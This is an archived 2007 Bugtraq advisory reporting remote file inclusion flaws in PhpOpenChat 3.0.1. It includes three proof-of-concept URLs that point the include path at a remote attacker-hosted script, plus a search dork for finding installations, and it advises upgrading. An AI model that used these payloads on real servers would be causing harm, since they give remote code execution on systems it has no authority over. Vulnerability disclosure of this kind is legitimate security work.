PhpOpenChat <= 3.0.1 (poc.php) Multiple Remote File Include Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PhpOpenChat <= 3.0.1 (poc.php) Multiple Remote File Include Vulnerabilities
From: seko@xxxxxxxxxx
Date: 10 Apr 2007 18:08:47 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

--------------------------------------------------
PhpOpenChat <= 3.0.1 (poc.php) Multiple Remote File Include Vulnerabilities
--------------------------------------------------

Author          : SekoMirza
Date Found      : Nisan 11 2007
Location        : Fransa // ... 
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
--------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~
Application     : PhpOpenChat
version         : 3.0.1
vendor          : http://phpopenchat.org/
source url      : 
http://phpopenchat.org/tr.tar.gz?PHPSESSID=3f694b033a2798aac446b05f87e361ce
--------------------------------------------------

Description:
~~~~~~~~

PHPOpenChat is a high performance php-based chat server software for a live 
chat-room or -module on every php-based site. The first version has been 
developed for a live-chat-subproject of the main german education portal (DBS) 
called "SchulWeb". The PHPOpenChat have had to manage alot of users, around 
100-150 concurrent chatters, the most behind firewalls and in front of old 
computers. Based on this experiences, we developed the version 3 of our free 
chat-server completely new from scratch.
At this time you can integrate this chat software into postnuke, phpbb, yabbse, 
etc. as a module. 

--------------------------------------------------

Vulnerability:
~~~~~~~~~~~

I found vulnerability script in poc.php


Proof Of Concept:
~~~~~~~~~~~~

contrib/phpbb/poc.php?phpbb_root_path=http://attact.com/colok.txt?
contrib/phpbb/poc.php?poc_root_path=http://attact.com/colok.txt?
contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php?phpbb_root_path=http://attact.com/colok.txt?

--------------------------------------------------

google d0rk:
~~~~~~~
"PhpOpenChat"

--------------------------------------------------
Solution:
~~~
- download new version in vendor URL 

--------------------------------------------------
Shoutz:
~~
~ My  Sweet       -> Caramel 
~ For Mp3s        -> Hypn0sis
~ For Support     -> www.starhack.org
~ My  Bro         -> PhantomOrchid
~ My  Preceptor   -> Erank Kazno

Prev by Date: EEYE: Windows Vista CSRSS Dangling Process Pointer Privilege Escalation
Next by Date: Secunia Research: Microsoft Agent URL Parsing Memory Corruption Vulnerability
Previous by thread: EEYE: Windows Vista CSRSS Dangling Process Pointer Privilege Escalation
Next by thread: Secunia Research: Microsoft Agent URL Parsing Memory Corruption Vulnerability
Index(es):
- Date
- Thread